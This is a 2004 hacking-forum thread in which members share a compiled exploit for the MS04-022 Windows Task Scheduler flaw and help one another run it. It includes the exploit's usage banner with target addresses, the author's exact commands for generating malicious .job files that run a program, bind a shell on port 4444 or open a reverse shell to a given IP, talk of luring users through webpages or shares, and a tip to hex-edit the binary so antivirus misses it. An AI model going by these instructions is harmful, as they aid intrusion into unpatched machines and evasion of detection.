studnikov
Jul 27 2004, 09:58 AM
It seems like a lot of people had problems compiling this.
I didn't, so I thought I would post it for the ones who did.
Thanks to ScriptGod for the code.
| CODE |
Compiling... MS04-022ScriptGod.cpp
MS04-022ScriptGod.obj - 0 error(s), 0 warning(s)
Linking...
MS04-022ScriptGod.exe - 0 error(s), 0 warning(s)
|
z-man
Jul 27 2004, 10:00 AM
10q very much
but on what port that exploit work

445?
The Storm
Jul 27 2004, 10:11 AM
thank ya 2 downloads 2 replies *g*
nuorder
Jul 27 2004, 11:10 AM
| QUOTE (z-man @ Jul 27 2004, 08:00 PM) |
10q very much
but on what port that exploit work 445? |
come on man be serious
its local unless you specify a port for the shell
ivan288
Jul 27 2004, 11:41 AM
usage: new <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >
TargetID Name EIP
----------------------------------------------------------
0 Windows XP SP0+1 GER 0x76e21a21
1 DoS Windows XP ALL 0xffffffff
PayloadID Name
--------------------------
0 WinExec
1 BindShell
2 ReverseShell
any help on how to use this. i mean what u put in for command for example.
ivan288
Jul 27 2004, 11:51 AM
i tried:
exploit.exe 0 1 k.bat 6666 127.0.0.1
it's supposed to make a k.bat file with bindshell on port 6666.
what it does is it creates k.bat in the same directory. But then it doesn't open the shell even when i click on the .bat.
not sure what i am doin wrong.
Coktailcrazy
Jul 27 2004, 12:02 PM
nice work to compile this!! gonna test it out!
thorel
Jul 27 2004, 12:12 PM
Nice job man, sweet
nuorder
Jul 27 2004, 12:25 PM
| QUOTE (ivan288 @ Jul 27 2004, 09:51 PM) |
i tried: exploit.exe 0 1 k.bat 6666 127.0.0.1
it's supposed to make a k.bat file with bindshell on port 6666. what it does is it creates k.bat in the same directory. But then it doesn't open the shell even when i click on the .bat. not sure what i am doin wrong. |
instead of k.bat you should have k.job, it is sometimes a good idea to read the main article on a vulnerability before you try to use it
| QUOTE |
How could an attacker exploit this vulnerability? There are many ways that a system could be vulnerable to this attack. Here are some examples:
An attacker could host a malicious Web site that is designed to exploit this vulnerability through Internet Explorer and then persuade a user to view the Web site.
An attacker could add a specially crafted .job file to the local file system or to a network share and then persuade the user to view the folder by using Windows Explorer.
An attacker could also access the affected component through another vector. For example, an attacker could log on to the system interactively or by using another program that passes parameters to the vulnerable component (locally or remotely).
|
from the microsoft site www.microsoft.com/technet/security/bulletin/MS04-022.mspx
DrDoc
Jul 27 2004, 03:02 PM
Thx 4 the compiled Version

i have tested it to compile it.. with the result im a noob

25 Downloads

and just a few replies.. very poor

BIG THX

Cya Doc
ScriptGod
Jul 27 2004, 03:37 PM
- first the TargetID (there are only german atm)
- second the ID of the payload you wanna use
- the output file (must be .job)
- parameter of the payload
examples:
- winexec (runs notepad.exe)
job.exe 0 0 C:\test.job notepad.exe
- bindshell (target binds a shell on port 4444)
job.exe 0 1 C:\test.job 4444
- reverseshell (target connects to 192.168.0.1:666)
job.exe 0 2 C:\test.job 192.168.0.1 666
The Storm
Jul 27 2004, 04:15 PM
is this a local exploit? cause there isn't a remote address required ?!?
ScriptGod
Jul 27 2004, 04:29 PM
| QUOTE (The Storm @ Jul 27 2004, 04:15 PM) |
| is this a local exploit? cause there isn't a remote address required ?!? |
yes mainly local. because it requires user interactivity
=k3Rn=
Jul 27 2004, 05:25 PM
hm that's a pity
The Storm
Jul 28 2004, 07:47 AM
hm when i use this exploit my explorer.exe crashes

is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!?
mortello
Jul 28 2004, 04:59 PM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
It can be used remotely, you just need users interactivity....so it's a bit more like a local exploit
another way of using it, is putting the .job into a explorer page.... (I believe that's how it goes too)
However, reading the advisory would explain a little more on what you can do with this advisory,....
ScriptGod
Jul 28 2004, 05:00 PM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
what language has your windows?
however remote is only possible with USER INTERACTIVITY.
newbie
Jul 28 2004, 05:07 PM
NAV2004 Detects it immediately.
):
Gotisch
Jul 28 2004, 08:33 PM
why

you should be happy the antivir software houses are updating their filters that fast!
mortello
Jul 29 2004, 01:51 AM
| QUOTE (newbie @ Jul 28 2004, 05:07 PM) |
NAV2004 Detects it immediately. ): |
hex edit it and most AV won't pick it up
Thanks Scriptgod for the precision on the part where I was wrong about the webpage !
The Storm
Jul 30 2004, 10:14 PM
I have Windows XP Professional German SP1
Serhat
Aug 2 2004, 07:25 AM
| QUOTE (The Storm @ Jul 28 2004, 07:47 AM) |
hm when i use this exploit my explorer.exe crashes is there a chance to make this exploit a remote exploit or can the Vulnerability only be used local ?!? |
This can only be because you are patched?
here it crashes also.. but then again I am using the Dutch version of Windows XP
Also compiled fine here.. if the exploit wasn't upped I would have done it.. but seems I am too late

Serhat